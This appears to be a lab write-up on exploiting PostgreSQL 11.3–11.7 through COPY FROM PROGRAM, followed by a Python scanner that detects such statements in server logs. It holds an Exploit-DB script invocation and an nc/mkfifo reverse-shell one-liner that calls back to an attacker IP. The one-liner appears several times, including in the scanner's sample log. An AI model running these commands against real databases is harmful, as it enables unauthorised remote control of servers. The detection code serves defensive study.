# Exploitation

```
PostgreSQL DB 11.3 - 11.7
```

This version of PostgreSQL is vulnerable to RCE.

{% embed url="<https://www.exploit-db.com/exploits/50847>" %}

I was able to execute commands but I was never able to get a reverse shell until I read this article here.

{% embed url="<https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767>" %}

![](https://3997521420-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKc58zAyg2kLPcEufCTKM%2Fuploads%2FKQI6oM3iulTpBgbGejC4%2F2022-07-28_16-09.png?alt=media\&token=93a02d23-8d01-4763-b2c4-9d1f1e231947)

```
python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f' 

[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67
```

One-liner:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f
```

This got me remote code execution as well as creating a table and getting a shell using the exact same method.

```
postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f';
COPY 0
```
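A log-side check for the `COPY ... FROM PROGRAM` statement shown above, as an added example that is not part of the original write-up. It assumes statement logging is on (`log_statement = 'all'`) with a `log_line_prefix` of `%t [%p] %u@%d `; the sample log lines and the function names are constructed for illustration.

```python
import re

# A single-quoted SQL string literal; '' inside it is an escaped quote.
LITERAL = re.compile(r"'(?:[^']|'')*'")
# Run against the statement with literals masked out, so the keywords
# cannot be matched inside ordinary string data. Placeholders look like '0'.
COPY_PROGRAM = re.compile(
    r"\bCOPY\b[^;]*?\b(FROM|TO)\s+PROGRAM\b\s*(?:E?'(\d+)')?", re.IGNORECASE)
# Assumed prefix: log_line_prefix = '%t [%p] %u@%d '
STATEMENT = re.compile(
    r"\[(?P<pid>\d+)\]\s+(?P<who>\S+)\s+LOG:\s+statement:\s+(?P<sql>.*)$")

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = """\
2022-07-28 16:08:55 UTC [2101] app@shop LOG:  statement: SELECT id FROM notes WHERE body = 'copy t from program ''x''';
2022-07-28 16:09:01 UTC [2113] postgres@postgres LOG:  statement: CREATE TABLE shell(output text);
2022-07-28 16:09:02 UTC [2113] postgres@postgres LOG:  statement: COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f';
2022-07-28 16:09:07 UTC [2113] postgres@postgres LOG:  statement: copy (SELECT 1) to  program 'logger ''export done''';
2022-07-28 16:09:09 UTC [2120] app@shop LOG:  statement: COPY orders FROM '/srv/import/orders.csv';
"""

def find_copy_program(sql):
    """Return (direction, command) for each COPY ... PROGRAM in one statement."""
    literals = []
    def mask(m):
        # Remember the unescaped literal and leave its index as a placeholder.
        literals.append(m.group(0)[1:-1].replace("''", "'"))
        return f"'{len(literals) - 1}'"
    skeleton = LITERAL.sub(mask, sql)
    # command is None when the argument is not a single-quoted literal
    # (for example dollar-quoted); the statement is still reported.
    return [(m.group(1).upper(),
             literals[int(m.group(2))] if m.group(2) else None)
            for m in COPY_PROGRAM.finditer(skeleton)]

def scan(log_text):
    """Return one dict per COPY ... PROGRAM statement found in the log text."""
    hits = []
    for line in log_text.splitlines():
        m = STATEMENT.search(line)
        if not m:
            continue
        for direction, command in find_copy_program(m.group("sql")):
            hits.append({"pid": int(m.group("pid")), "who": m.group("who"),
                         "direction": direction, "command": command})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
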
